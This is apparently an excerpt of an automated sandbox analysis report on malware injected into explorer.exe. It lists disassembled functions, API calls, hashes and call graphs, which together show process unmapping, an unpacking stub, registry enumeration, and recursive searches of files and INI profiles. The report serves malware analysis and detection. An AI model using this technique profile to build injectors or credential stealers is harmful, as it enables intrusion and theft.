                                                                        • Instruction ID: ea82051fe23ab4ebb4c5e98b49454caac3ce8a9d40d8c1276cfecb744515b444
                                                                        • Opcode Fuzzy Hash: 53fe5c75ce735af9f328831f578cfa4e1cfb8c6bf62a0f6aff7af70ddc1665ae
                                                                        • Instruction Fuzzy Hash: AE018175220306AF9B01AF25E81889FBBEDFF85651B08C43EF855C7210DF75E9649B20
                                                                        Function 03271953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                        • lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                        • lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                        • lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatlstrlen
                                                                        • String ID:
                                                                        • API String ID: 1475610065-0
                                                                        • Opcode ID: 5865bb4346489ae25159500cf0cf49f1f3ff7367ee7cbdbf3d051c9a474b3767
                                                                        • Instruction ID: eec2b10d65ebcab3a0cb7f2af18dc4fdf91f776c3087dd8a4ce2efb0cff01854
                                                                        • Opcode Fuzzy Hash: 5865bb4346489ae25159500cf0cf49f1f3ff7367ee7cbdbf3d051c9a474b3767
                                                                        • Instruction Fuzzy Hash: 3EE09B6631021D5B8714B6AE6C94D7B779CEEC95A530D0079FA05D3305FE66EC0546B0
                                                                        Function 0329F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03276A81: memset.NTDLL ref: 03276A9C
                                                                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0329F2A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _aulldivmemset
                                                                        • String ID: %llu$%llu
                                                                        • API String ID: 714058258-4283164361
                                                                        • Opcode ID: d222aed75d6ee5ebae811873785402d36b90fe3116ab5fa1249bc87a04b1d014
                                                                        • Instruction ID: 0cd9697d1f2bdee2fa55a3df2305d28c7416f214f94ffe2cb18b883e5180d25d
                                                                        • Opcode Fuzzy Hash: d222aed75d6ee5ebae811873785402d36b90fe3116ab5fa1249bc87a04b1d014
                                                                        • Instruction Fuzzy Hash: 9821CFB6A607057BDB10EA248C41F7AB758AF81730F044229B9219B6C0DBA1AD918AE1
                                                                        Function 0328203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _allmul.NTDLL(?,00000000,?), ref: 03282174
                                                                        • _allmul.NTDLL(?,?,?,00000000), ref: 0328220E
                                                                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 03282241
                                                                        • _allmul.NTDLL(03272E26,00000000,?,?), ref: 03282295
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _allmul
                                                                        • String ID:
                                                                        • API String ID: 4029198491-0
                                                                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                        • Instruction ID: bac8ffc0e07ee2815379e36243d7a6d0e7e2aa50df525fc81d66bdb740a210e8
                                                                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                        • Instruction Fuzzy Hash: 83A17C74729706DFC714EF69C490A2EB7E9AF88704F04492DF6558B294EBB0EC818B42
                                                                        Function 032878B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID:
                                                                        • API String ID: 1297977491-0
                                                                        • Opcode ID: 78434c0900277a6aa22a8789dcaf8fdef7a1cd05dfc0f263744cb3fc992415b6
                                                                        • Instruction ID: bf37fbc53282b78fccbc371d6c59c7501fd19e5a0a26dca6e5f31aba9d13477e
                                                                        • Opcode Fuzzy Hash: 78434c0900277a6aa22a8789dcaf8fdef7a1cd05dfc0f263744cb3fc992415b6
                                                                        • Instruction Fuzzy Hash: 7F81C4756293159FC350EF2DC880A2BBBE5FF88604F14496DF8898B291D770E985CB91
                                                                        Function 0327190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,03272783), ref: 0327192B
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,03272783), ref: 03271930
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 03271946
                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 0327194A
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatlstrlen
                                                                        • String ID:
                                                                        • API String ID: 1475610065-0
                                                                        • Opcode ID: e5c1d5da5f1b078ab9049d5adf59cb15856bac40fa3cb6ccc533f47e8f11ffd1
                                                                        • Instruction ID: 8346add313f8a481cbe4254ce77c886418c04da1ede9462c7709fcdd85658739
                                                                        • Opcode Fuzzy Hash: e5c1d5da5f1b078ab9049d5adf59cb15856bac40fa3cb6ccc533f47e8f11ffd1
                                                                        • Instruction Fuzzy Hash: 74E09B6631021D5B4720B6AE6C84D7B76DCEEC55A530D0175F905D3305EEA5AC0186B0

                                                                        Execution Graph

                                                                        Execution Coverage:21.7%
                                                                        Dynamic/Decrypted Code Coverage:87.3%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:181
                                                                        Total number of Limit Nodes:17
                                                                        execution_graph 1134 1da1af 1135 1da1bd 1134->1135 1136 1da298 3 API calls 1135->1136 1137 1da1cf 1135->1137 1136->1137 1123 1da1f9 1124 1da248 1123->1124 1125 1da228 1123->1125 1127 1da298 1125->1127 1132 1da29d 1127->1132 1128 1da385 LoadLibraryA 1128->1132 1130 1da3e0 VirtualProtect VirtualProtect 1131 1da46e 1130->1131 1131->1131 1132->1128 1132->1130 1133 1da3d5 1132->1133 1133->1124 936 1da298 941 1da29d 936->941 937 1da385 LoadLibraryA 937->941 939 1da3e0 VirtualProtect VirtualProtect 940 1da46e 939->940 940->940 941->937 941->939 942 1da3d5 941->942 991 1d3608 996 1d3458 StrStrIW 991->996 994 1d3458 17 API calls 995 1d365d 994->995 997 1d348f 996->997 998 1d350f 996->998 1021 1d2774 997->1021 1000 1d3523 RegOpenKeyExW 998->1000 1001 1d35e4 1000->1001 1007 1d354d 1000->1007 1002 1d1860 RtlFreeHeap 1001->1002 1005 1d35f7 1002->1005 1003 1d35b5 RegEnumKeyExW 1003->1001 1003->1007 1004 1d34a8 1004->998 1006 1d3507 1004->1006 1034 1d28a0 1004->1034 1005->994 1008 1d1860 RtlFreeHeap 1006->1008 1007->1003 1011 1d2700 RtlFreeHeap 1007->1011 1014 1d3458 14 API calls 1007->1014 1016 1d1860 RtlFreeHeap 1007->1016 1008->998 1011->1007 1012 1d1860 RtlFreeHeap 1012->1006 1014->1007 1016->1007 1017 1d34fa 1017->1012 1020 1d1860 RtlFreeHeap 1020->1017 1022 1d2797 RegOpenKeyExW 1021->1022 1023 1d2793 1021->1023 1024 1d286b 1022->1024 1025 1d27d5 RegQueryValueExW 1022->1025 1023->1022 1027 1d288d 1024->1027 1028 1d2774 RtlFreeHeap 1024->1028 1026 1d285b RegCloseKey 1025->1026 1029 1d27fe 1025->1029 1026->1024 1026->1027 1027->1004 1028->1027 1029->1026 1030 1d281a RegQueryValueExW 1029->1030 1031 1d2851 1030->1031 1033 1d2844 1030->1033 1032 1d1860 RtlFreeHeap 1031->1032 1032->1033 1033->1026 1035 1d28b9 1034->1035 1036 1d2922 1035->1036 1037 1d1860 RtlFreeHeap 1035->1037 1036->1017 1040 1d2700 1036->1040 1039 1d28df 1037->1039 1038 1d2774 5 API calls 1038->1039 1039->1036 1039->1038 1041 1d2712 1040->1041 1042 1d1860 RtlFreeHeap 1041->1042 1043 1d271d 1042->1043 1043->1017 1044 1d3254 1043->1044 1068 1d298c 1044->1068 1047 1d343a 1047->1020 1048 1d298c GetFileAttributesW 1051 1d3295 1048->1051 1049 1d342c 1077 1d30a8 1049->1077 1051->1047 1051->1049 1072 1d2938 1051->1072 1054 1d340c 1056 1d1860 RtlFreeHeap 1054->1056 1055 1d3304 GetPrivateProfileSectionNamesW 1055->1054 1065 1d331e 1055->1065 1057 1d3414 1056->1057 1058 1d1860 RtlFreeHeap 1057->1058 1059 1d341c 1058->1059 1060 1d1860 RtlFreeHeap 1059->1060 1061 1d3424 1060->1061 1063 1d1860 RtlFreeHeap 1061->1063 1062 1d334e GetPrivateProfileStringW 1064 1d3379 GetPrivateProfileIntW 1062->1064 1062->1065 1063->1049 1064->1065 1065->1054 1065->1062 1066 1d30a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1065->1066 1067 1d1860 RtlFreeHeap 1065->1067 1066->1065 1067->1065 1069 1d2999 1068->1069 1071 1d29a9 1068->1071 1070 1d299e GetFileAttributesW 1069->1070 1069->1071 1070->1071 1071->1047 1071->1048 1073 1d2945 1072->1073 1074 1d2980 1072->1074 1073->1074 1075 1d294a CreateFileW 1073->1075 1074->1054 1074->1055 1075->1074 1076 1d2972 CloseHandle 1075->1076 1076->1074 1078 1d30cc 1077->1078 1079 1d30f1 FindFirstFileW 1078->1079 1080 1d3237 1079->1080 1090 1d3117 1079->1090 1081 1d1860 RtlFreeHeap 1080->1081 1082 1d323f 1081->1082 1083 1d1860 RtlFreeHeap 1082->1083 1084 1d3247 1083->1084 1084->1047 1085 1d3210 FindNextFileW 1086 1d3226 FindClose 1085->1086 1085->1090 1086->1080 1087 1d1860 RtlFreeHeap 1087->1085 1089 1d2700 RtlFreeHeap 1089->1090 1090->1085 1090->1087 1090->1089 1091 1d30a8 RtlFreeHeap 1090->1091 1092 1d1860 RtlFreeHeap 1090->1092 1093 1d2f7c 1090->1093 1091->1090 1092->1090 1103 1d2bc0 1093->1103 1096 1d3086 1096->1090 1098 1d307e 1099 1d1860 RtlFreeHeap 1098->1099 1099->1096 1100 1d2e04 RtlFreeHeap 1101 1d2fb6 1100->1101 1101->1096 1101->1098 1101->1100 1102 1d1860 RtlFreeHeap 1101->1102 1102->1101 1104 1d2bf3 1103->1104 1105 1d2700 RtlFreeHeap 1104->1105 1106 1d2c54 1105->1106 1107 1d2a54 RtlFreeHeap 1106->1107 1108 1d2c68 1107->1108 1109 1d2c7e 1108->1109 1110 1d1860 RtlFreeHeap 1108->1110 1111 1d1860 RtlFreeHeap 1109->1111 1110->1109 1117 1d2cb2 1111->1117 1112 1d2da3 1113 1d1860 RtlFreeHeap 1112->1113 1114 1d2dd9 1113->1114 1115 1d1860 RtlFreeHeap 1114->1115 1116 1d2de1 1115->1116 1116->1096 1119 1d2a54 1116->1119 1117->1112 1118 1d1860 RtlFreeHeap 1117->1118 1118->1112 1120 1d2a86 1119->1120 1121 1d1860 RtlFreeHeap 1120->1121 1122 1d2ad9 1120->1122 1121->1122 1122->1101 1138 1d3668 1139 1d3458 17 API calls 1138->1139 1140 1d369b 1139->1140 1141 1d3458 17 API calls 1140->1141 1142 1d36bd 1141->1142 943 1d37f4 944 1d3804 943->944 951 1d372c 944->951 947 1d387c 949 1d3817 949->947 961 1d36c8 949->961 952 1d375a 951->952 953 1d3777 RegCreateKeyExW 952->953 954 1d37bc RegCloseKey 953->954 955 1d37cd 953->955 954->955 969 1d1860 955->969 958 1d22b4 959 1d22c8 CreateStreamOnHGlobal 958->959 960 1d22d6 958->960 959->960 960->949 962 1d36cd 961->962 967 1d371e 961->967 963 1d3716 962->963 973 1d21e4 962->973 965 1d1860 RtlFreeHeap 963->965 965->967 966 1d3706 968 1d1860 RtlFreeHeap 966->968 967->947 968->963 971 1d186e 969->971 970 1d1886 970->947 970->958 971->970 972 1d1878 RtlFreeHeap 971->972 972->970 974 1d220b 973->974 979 1d1e20 974->979 977 1d1860 RtlFreeHeap 978 1d2297 977->978 978->966 989 1d1e6d 979->989 980 1d21b5 981 1d1860 RtlFreeHeap 980->981 982 1d21cb 981->982 982->977 983 1d219b 983->980 984 1d1860 RtlFreeHeap 983->984 984->980 985 1d2177 986 1d1860 RtlFreeHeap 985->986 987 1d218e 986->987 987->983 988 1d1860 RtlFreeHeap 987->988 988->983 989->980 989->983 989->985 990 1d1860 RtlFreeHeap 989->990 990->985 1143 1da1e0 1144 1da1e6 1143->1144 1145 1da298 3 API calls 1144->1145 1146 1da248 1145->1146

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_001D141D 1 Function_001D971C 2 Function_001D4019 3 Function_001D2498 37 Function_001D23AC 3->37 63 Function_001D2340 3->63 4 Function_001DA298 50 Function_001DA25A 4->50 5 Function_001D2514 45 Function_001D23A0 5->45 53 Function_001D2354 5->53 59 Function_001D234C 5->59 76 Function_001D23F0 5->76 87 Function_001D2360 5->87 6 Function_001D1B14 28 Function_001D1838 6->28 7 Function_001D4011 8 Function_001D1D10 8->28 70 Function_001D18F8 8->70 9 Function_001D2410 9->37 9->76 10 Function_001D2610 10->28 11 Function_001D9912 12 Function_001D9C92 13 Function_001D298C 14 Function_001D1B8C 14->28 15 Function_001D188C 15->28 16 Function_001DB00C 17 Function_001D1508 18 Function_001D2308 19 Function_001D2688 19->28 20 Function_001D3608 48 Function_001D3458 20->48 21 Function_001D1405 22 Function_001D2E04 22->14 22->28 84 Function_001D1860 22->84 23 Function_001D4001 24 Function_001D1980 25 Function_001D1000 26 Function_001D2700 26->19 26->84 27 Function_001D2938 29 Function_001D1938 30 Function_001D22B4 31 Function_001D9EB4 32 Function_001D38B0 32->28 32->32 54 Function_001D1AD4 32->54 33 Function_001D9930 34 Function_001D14B2 35 Function_001D372C 35->28 35->84 36 Function_001D22AC 38 Function_001D272C 39 Function_001DA1AF 39->4 40 Function_001D30A8 40->19 40->26 40->38 40->40 67 Function_001D2F7C 40->67 71 Function_001D2AF8 40->71 40->84 41 Function_001D47A7 42 Function_001D99A7 43 Function_001D4021 44 Function_001D28A0 44->28 73 Function_001D2774 44->73 44->84 46 Function_001D1E20 46->8 46->15 46->24 46->28 58 Function_001D18D0 46->58 62 Function_001D1C40 46->62 46->70 46->84 85 Function_001D1DE0 46->85 47 Function_001D1822 48->19 48->26 48->28 48->44 48->48 52 Function_001D3254 48->52 64 Function_001D29C0 48->64 48->73 48->84 49 Function_001D9ADA 51 Function_001DA055 52->13 52->19 52->27 52->28 52->38 52->40 52->84 55 Function_001D14D4 56 Function_001D1254 57 Function_001D2A54 57->28 57->84 60 Function_001D1A4C 61 Function_001D36C8 61->6 80 Function_001D18E8 61->80 83 Function_001D21E4 61->83 61->84 64->19 65 Function_001D2BC0 65->10 65->19 65->26 65->28 65->29 65->38 65->57 65->84 66 Function_001D9FC2 67->22 67->57 67->65 72 Function_001D2EF8 67->72 67->84 68 Function_001D14F9 69 Function_001DA1F9 69->4 71->28 72->10 73->28 73->73 73->84 74 Function_001D37F4 74->18 74->30 74->35 74->36 74->53 74->61 77 Function_001D2570 74->77 79 Function_001D2B6C 74->79 81 Function_001D22E8 74->81 75 Function_001D1576 76->37 77->28 77->45 77->53 78 Function_001D156C 79->3 79->5 82 Function_001D3668 82->48 83->28 83->46 83->84 84->54 85->60 86 Function_001D1560 88 Function_001DA1E0 88->4

                                                                        Executed Functions

                                                                        Function 001D30A8 Relevance: 4.7, APIs: 3, Instructions: 153fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 184 1d30a8-1d30e3 call 1d2688 call 1d272c 189 1d30ec-1d3111 call 1d2688 FindFirstFileW 184->189 190 1d30e5-1d30e6 184->190 193 1d3237-1d3252 call 1d1860 * 2 189->193 194 1d3117-1d3118 189->194 190->189 195 1d311f-1d3124 194->195 197 1d31ad-1d31df call 1d2688 call 1d2700 195->197 198 1d312a-1d313e 195->198 213 1d3208-1d320b call 1d1860 197->213 214 1d31e1-1d31eb call 1d2af8 197->214 205 1d3144-1d3158 198->205 206 1d3210-1d3220 FindNextFileW 198->206 205->206 212 1d315e-1d316b call 1d272c 205->212 206->195 208 1d3226-1d3230 FindClose 206->208 208->193 219 1d316d-1d3174 212->219 220 1d3176 212->220 213->206 214->213 223 1d31ed-1d3203 call 1d2f7c 214->223 222 1d3178-1d31a8 call 1d2688 call 1d2700 call 1d30a8 call 1d1860 219->222 220->222 222->197 223->213
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                        • Instruction ID: e0725c67f65c2af896ee9c226cd1d219abb0b36e30746fbc7e31b979eb80c14b
                                                                        • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                        • Instruction Fuzzy Hash: 5D417330718B4D5FDB54EB3894597AA73D2FBE8340F444A2AE45AC3391EF78D9048782
                                                                        Function 001D38B0 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 239 1d38b0-1d3907 call 1d1ad4 call 1d1838 NtUnmapViewOfSection call 1d388c 248 1d3909-1d390c call 1d38b0 239->248 249 1d3911-1d391a 239->249 248->249
                                                                        APIs
                                                                        • NtUnmapViewOfSection.NTDLL ref: 001D38F2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: SectionUnmapView
                                                                        • String ID:
                                                                        • API String ID: 498011366-0
                                                                        • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                        • Instruction ID: d7afa70458a50b82f9b773229a29cc8fc1395a10b81e4b2ece8b65aa48b439dc
                                                                        • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                        • Instruction Fuzzy Hash: 9AF0A030F11A082BEA6C77BD685D3282280EB68310F90062BB525C33E2DE398A458302
                                                                        Function 001D2774 Relevance: 6.1, APIs: 4, Instructions: 124registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE ref: 001D27C7
                                                                        • RegQueryValueExW.KERNELBASE ref: 001D27F4
                                                                        • RegQueryValueExW.KERNELBASE ref: 001D283A
                                                                        • RegCloseKey.KERNELBASE ref: 001D2860
                                                                          • Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseFreeHeapOpen
                                                                        • String ID:
                                                                        • API String ID: 1641618270-0
                                                                        • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                        • Instruction ID: 4e7e998e761750d41a5a54e5edd1ea72fde0c9c61537ead481fb8b03583dcee9
                                                                        • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                        • Instruction Fuzzy Hash: 7A316E30208B488FE769DB28D45877ABBD0FBB8355F54062FE49AC3264DF34D8469742
                                                                        Function 001D372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 22 1d372c-1d37ba call 1d1838 RegCreateKeyExW 26 1d37bc-1d37cb RegCloseKey 22->26 27 1d37d6-1d37f0 call 1d1860 22->27 26->27 28 1d37cd-1d37d3 26->28 28->27
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreate
                                                                        • String ID: ?
                                                                        • API String ID: 2932200918-1684325040
                                                                        • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                        • Instruction ID: b182950bdd00a600025b031e3234daaaa3e588dabaa9d198138e844f566c4a8f
                                                                        • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                        • Instruction Fuzzy Hash: 18116070618B488FD751DF69D48866AB7E1FB98345F50062FE48AC3360DF389985CB82
                                                                        Function 001DA298 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 31 1da298-1da29b 32 1da2a5-1da2a9 31->32 33 1da2ab-1da2b3 32->33 34 1da2b5 32->34 33->34 35 1da29d-1da2a3 34->35 36 1da2b7 34->36 35->32 37 1da2ba-1da2c1 36->37 39 1da2cd 37->39 40 1da2c3-1da2cb 37->40 39->37 41 1da2cf-1da2d2 39->41 40->39 42 1da2d4-1da2e2 41->42 43 1da2e7-1da2f4 41->43 44 1da31e-1da339 42->44 45 1da2e4-1da2e5 42->45 53 1da30e-1da31c call 1da25a 43->53 54 1da2f6-1da2f8 43->54 47 1da36a-1da36d 44->47 45->43 48 1da36f-1da370 47->48 49 1da372-1da379 47->49 51 1da351-1da355 48->51 52 1da37f-1da383 49->52 55 1da33b-1da33e 51->55 56 1da357-1da35a 51->56 57 1da385-1da39e LoadLibraryA 52->57 58 1da3e0-1da3e9 52->58 53->32 59 1da2fb-1da302 54->59 55->49 64 1da340 55->64 56->49 60 1da35c-1da360 56->60 63 1da39f-1da3a6 57->63 61 1da3ec-1da3f5 58->61 79 1da30c 59->79 80 1da304-1da30a 59->80 65 1da341-1da345 60->65 66 1da362-1da369 60->66 67 1da41a-1da46a VirtualProtect * 2 61->67 68 1da3f7-1da3f9 61->68 63->52 70 1da3a8 63->70 64->65 65->51 71 1da347-1da349 65->71 66->47 75 1da46e-1da473 67->75 73 1da40c-1da418 68->73 74 1da3fb-1da40a 68->74 76 1da3aa-1da3b2 70->76 77 1da3b4-1da3bc 70->77 71->51 78 1da34b-1da34f 71->78 73->74 74->61 75->75 81 1da475-1da484 75->81 82 1da3be-1da3ca 76->82 77->82 78->51 78->56 79->53 79->59 80->79 85 1da3cc-1da3d3 82->85 86 1da3d5-1da3df 82->86 85->63
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE ref: 001DA397
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 001DA441
                                                                        • VirtualProtect.KERNELBASE ref: 001DA45F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D9000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d9000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 895956442-0
                                                                        • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                        • Instruction ID: 5768982b0f36e44076531008775d5e4297576efe290e56356b008267c4342c97
                                                                        • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                        • Instruction Fuzzy Hash: 7351463275891D5BCB28EA7C98942F5B7D2FF59321B98062BC49AC3384D759D8468383
                                                                        Function 001D3254 Relevance: 4.7, APIs: 3, Instructions: 210COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 87 1d3254-1d3287 call 1d298c 90 1d328d-1d3297 call 1d298c 87->90 91 1d343a-1d3456 87->91 90->91 94 1d329d-1d32aa call 1d272c 90->94 97 1d32ac-1d32b3 94->97 98 1d32b5 94->98 99 1d32b7-1d32c2 call 1d2688 97->99 98->99 102 1d342c-1d3435 call 1d30a8 99->102 103 1d32c8-1d32fe call 1d2688 call 1d1838 * 2 call 1d2938 99->103 102->91 113 1d340c-1d3427 call 1d1860 * 4 103->113 114 1d3304-1d3318 GetPrivateProfileSectionNamesW 103->114 113->102 114->113 116 1d331e-1d3326 114->116 116->113 118 1d332c-1d332f 116->118 118->113 120 1d3335-1d3348 118->120 125 1d334e-1d3377 GetPrivateProfileStringW 120->125 126 1d33f0-1d3406 120->126 125->126 128 1d3379-1d3398 GetPrivateProfileIntW 125->128 126->113 126->118 129 1d339a-1d33ad call 1d2688 128->129 130 1d33e5-1d33eb call 1d30a8 128->130 135 1d33af-1d33b3 129->135 136 1d33c6-1d33e3 call 1d30a8 call 1d1860 129->136 130->126 137 1d33bd-1d33c4 135->137 138 1d33b5-1d33ba 135->138 136->126 137->135 137->136 138->137
                                                                        APIs
                                                                          • Part of subcall function 001D298C: GetFileAttributesW.KERNELBASE ref: 001D299E
                                                                        • GetPrivateProfileSectionNamesW.KERNEL32 ref: 001D330F
                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 001D336F
                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 001D338C
                                                                          • Part of subcall function 001D30A8: FindFirstFileW.KERNELBASE ref: 001D3104
                                                                          • Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                        • String ID:
                                                                        • API String ID: 970345848-0
                                                                        • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                        • Instruction ID: e98378272e2651de6e2753318e27cd1a63479545120386f18f59f783f6cf2a44
                                                                        • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                        • Instruction Fuzzy Hash: AA51B430718F195BEB59BB2C985667972D2FBA8300B44056FE41AC3396EF78DD428387
                                                                        Function 001D3458 Relevance: 4.7, APIs: 3, Instructions: 172registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • StrStrIW.KERNELBASE ref: 001D347E
                                                                        • RegOpenKeyExW.KERNELBASE ref: 001D353F
                                                                        • RegEnumKeyExW.KERNELBASE ref: 001D35D6
                                                                          • Part of subcall function 001D2774: RegOpenKeyExW.KERNELBASE ref: 001D27C7
                                                                          • Part of subcall function 001D2774: RegQueryValueExW.KERNELBASE ref: 001D27F4
                                                                          • Part of subcall function 001D2774: RegQueryValueExW.KERNELBASE ref: 001D283A
                                                                          • Part of subcall function 001D2774: RegCloseKey.KERNELBASE ref: 001D2860
                                                                          • Part of subcall function 001D3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 001D330F
                                                                          • Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
